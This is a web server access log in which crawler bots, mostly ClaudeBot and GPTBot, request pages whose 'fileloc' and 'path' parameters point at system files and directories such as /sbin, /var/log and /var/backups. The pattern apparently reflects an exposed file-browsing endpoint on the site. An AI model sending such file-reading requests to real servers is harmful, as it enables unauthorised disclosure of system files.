216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvisudo&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fldconfig.real&path=%2F%2Fsbin HTTP/1.0" 200 2817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fproftpd%2Fproftpd.log.5.gz&path=%2Fvar%2Flog%2Fproftpd HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdmesg.1.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fagetty&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdmesg.2.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fa2enconf&path=%2F%2Fsbin HTTP/1.0" 200 7625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Falternatives.log.3.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:08 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fbyobu%2Fload_average&path=%2F%2Flib%2Fbyobu HTTP/1.0" 200 3465 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Ffsfreeze&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Falternatives.log.6.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fhalt&path=%2F%2Fsbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:08 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Flib%2Fgrub%2Fi386-pc HTTP/1.0" 200 12783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:05:08 +0000] "GET /q-~140wQ9R0RPxMpaGHCGFC7sYa8jYqHvifb3673/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images/images/images HTTP/1.0" 200 3367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Ffindfs&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Ftzconfig&path=%2F%2Fsbin HTTP/1.0" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fsnapd%2Fsnap-exec&path=%2F%2Flib%2Fsnapd HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Flocale-gen&path=%2F%2Fsbin HTTP/1.0" 200 4607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fproftpd%2Fproftpd.log.3.gz&path=%2Fvar%2Flog%2Fproftpd HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdpkg.log.3.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fgenl&path=%2F%2Fsbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Falternatives.log.7.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvgs&path=%2F%2Fsbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:10 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fproftpd%2Fproftpd.log.6.gz&path=%2Fvar%2Flog%2Fproftpd HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fzerofree&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdpkg.log.6.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fgdisk&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Ftarcat&path=%2F%2Fsbin HTTP/1.0" 200 3327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fa2disconf&path=%2F%2Fsbin HTTP/1.0" 200 7627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fproftpd%2Fproftpd.log.7.gz&path=%2Fvar%2Flog%2Fproftpd HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fapt%2Fapt.systemd.daily&path=%2F%2Flib%2Fapt HTTP/1.0" 200 7499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Falternatives.log.2.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvgmknodes&path=%2F%2Fsbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Falternatives.tar.4.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fa2ensite&path=%2F%2Fsbin HTTP/1.0" 200 7625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdpkg.log.7.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fadduser&path=%2F%2Fsbin HTTP/1.0" 200 13042 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fthin_repair&path=%2F%2Fsbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fcache_repair&path=%2F%2Fsbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Falternatives.tar.5.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fdumpe2fs&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fproftpd%2Fproftpd.log.2.gz&path=%2Fvar%2Flog%2Fproftpd HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdpkg.log.2.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fswapoff&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Falternatives.tar.3.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvgck&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fe2scrub&path=%2F%2Fsbin HTTP/1.0" 200 6027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fexinext&path=%2F%2Fsbin HTTP/1.0" 200 6303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Fapt.extended_states.4.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fcapsh&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Faddgnupghome&path=%2F%2Fsbin HTTP/1.0" 200 3958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:05:13 +0000] "GET /q-~34ReTmMLgzaBJYLQcO4Zt5yLve0a9ord11021/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Fapt.extended_states.5.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Falternatives.tar.6.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:13 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fenvironment.d%2F990-snapd.conf&path=%2F%2Flib%2Fenvironment.d HTTP/1.0" 200 2905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvcstime&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fgrpconv&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fexim4&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fxfs_fsr&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fwipefs&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Flvs&path=%2F%2Fsbin HTTP/1.0" 200 2809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvgconvert&path=%2F%2Fsbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fhdparm&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.66.163 - - [05/Nov/2025:00:05:14 +0000] "GET /?products=1679975360 HTTP/1.0" 200 26026 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.182 - - [05/Nov/2025:00:05:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fmklost+found&path=%2F%2Fsbin HTTP/1.0" 200 2817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fupdate-exim4defaults&path=%2F%2Fsbin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Falternatives.tar.1.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fxfs_growfs&path=%2F%2Fsbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvgcfgrestore&path=%2F%2Fsbin HTTP/1.0" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
217.113.194.38 - - [05/Nov/2025:00:05:16 +0000] "GET /our-works/intracom-riverside/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
216.73.216.182 - - [05/Nov/2025:00:05:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fe2label&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Fapt.extended_states.3.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Falternatives.tar.2.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Ffatlabel&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:16 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fsnapd%2Fsnapd.run-from-snap&path=%2F%2Flib%2Fsnapd HTTP/1.0" 200 2893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:05:17 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images/images HTTP/1.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:05:17 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fsnapd%2Fcomplete.sh&path=%2F%2Flib%2Fsnapd HTTP/1.0" 200 4968 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fdmstats&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fbackups%2Fapt.extended_states.6.gz&path=%2Fvar%2Fbackups HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:17 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fsnapd%2Fsnap-device-helper&path=%2F%2Flib%2Fsnapd HTTP/1.0" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Flvrename&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fmkfs.fat&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fuserdel&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Firqbalance&path=%2F%2Fsbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fbadblocks&path=%2F%2Fsbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
